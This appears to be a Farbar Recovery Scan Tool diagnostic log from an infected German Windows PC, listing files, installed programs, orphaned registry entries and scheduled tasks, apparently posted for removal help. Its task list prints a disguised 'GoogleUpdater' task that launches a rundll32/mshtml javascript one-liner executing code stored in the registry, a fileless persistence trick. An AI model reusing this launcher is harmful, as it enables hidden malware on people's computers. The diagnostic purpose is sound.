Files\Microsoft ATS 2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe 2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe 2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor 2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText 2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT 2014-11-13 13:15 - 2014-12-06 15:37 - 00000000 ____D () C:\AdwCleaner 2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat 2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll 2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector 2014-11-11 08:40 - 2014-12-06 16:09 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job 2014-11-11 08:39 - 2014-12-06 16:09 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job 2014-11-11 08:33 - 2014-11-11 08:36 - 01057112 _____ (Installer Setup ) C:\Users\finja\Downloads\installer_java_German.exe 2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump 2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7 2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia 2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess 2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 16:20 - 2009-02-27 09:31 - 01209056 _____ () C:\Windows\WindowsUpdate.log 2014-12-06 16:09 - 2014-06-08 13:02 - 00140398 _____ () C:\Windows\PFRO.log 2014-12-06 16:09 - 2013-11-26 19:43 - 00000000 ____D () C:\Windows\TempDF28D6CC-3D1E-B803-1F4F-B4B1FD7BEC31-Signatures 2014-12-06 16:09 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml 2014-12-06 16:09 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-12-06 16:09 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2014-12-06 16:09 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2014-12-06 16:08 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-12-06 10:43 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\PLA 2014-12-06 09:18 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja 2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65 2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles 2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic 2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung 2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia 2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe 2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox 2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google 2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google 2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394 2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache 2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET 2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk 2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE 2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT 2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG 2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini 2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp 2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin 2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe Files to move or delete: ==================== C:\Users\finja\remove.exe Some content of TEMP: ==================== C:\Users\finja\AppData\Local\Temp\Quarantine.exe C:\Users\finja\AppData\Local\Temp\sqlite3.dll ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signed C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-12-06 16:22 ==================== End Of Log ============================ --- --- --- Addition: Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x86) Version: 03-12-2014
Ran by finja at 2014-12-06 16:32:02
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version: - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version: - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version: - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version: - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version: - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version: - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version: - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version: - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version: - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version: - )
LightScribe 1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version: - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version: - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version: - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version: - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version: - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version: - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File
==================== Restore Points =========================
05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {0BFFF69F-8A2D-4D08-9001-59641D3A012D} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
